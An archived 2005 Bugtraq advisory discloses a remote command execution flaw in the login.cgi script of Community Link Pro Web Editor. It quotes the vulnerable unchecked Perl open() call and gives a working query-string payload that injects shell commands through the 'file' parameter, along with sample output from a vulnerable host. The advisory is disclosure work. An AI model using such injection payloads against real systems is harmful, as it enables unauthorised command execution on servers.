lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <42C2C1FA.2060302@mybox.it>
Date: Wed, 29 Jun 2005 15:44:58 +0000
From: mozako <mozako@...ox.it>
To: bugtraq@...urityfocus.com
Subject: [badroot security] Community link pro web editor: Remote command
 Execution


- -  - - - - - - - - - - - - - - - - - - - - - - - 
BADROOT SECURITY GROUP
Security Advisory 2005-#0x05
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
- -  - - - - - - - - - - - - - - - - - - - - - - - 

Authors .......   spher3 (spher3 at fatalimpulse dot net) 
	             mozako (admin at fatalimpulse dot net)
Date .............   29-06-2005
Product .......   Community Link Pro Web Editor (login.cgi)
Type ............   Remote Command Execution

o Description:
============================
Login.cgi is a login script written in perl by Community Link Pro Web Editor 
that allows to a remote user to login in his own personal page.

o Vulnerable Code:
============================
[...]
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");
foreach (<FILE2>) {
   print;
}
close(FILE2);
[...]

In this code there isn't a control in cgi query and exactly in $FORM{'file'}.
Without a control you can run system command remotely (Remote 
Command Execution Vulnerability) with a string 
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.

Example:

http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|

Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux
uid=72(apache) gid=72(apache) groups=72(apache)


o Proof of concept:
============================
You can download a simple PoC Exploit from: 
http://www.badroot.org/exploits/clogin.pl

Original ADV:
http://www.badroot.org/advisories/SA0x05



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ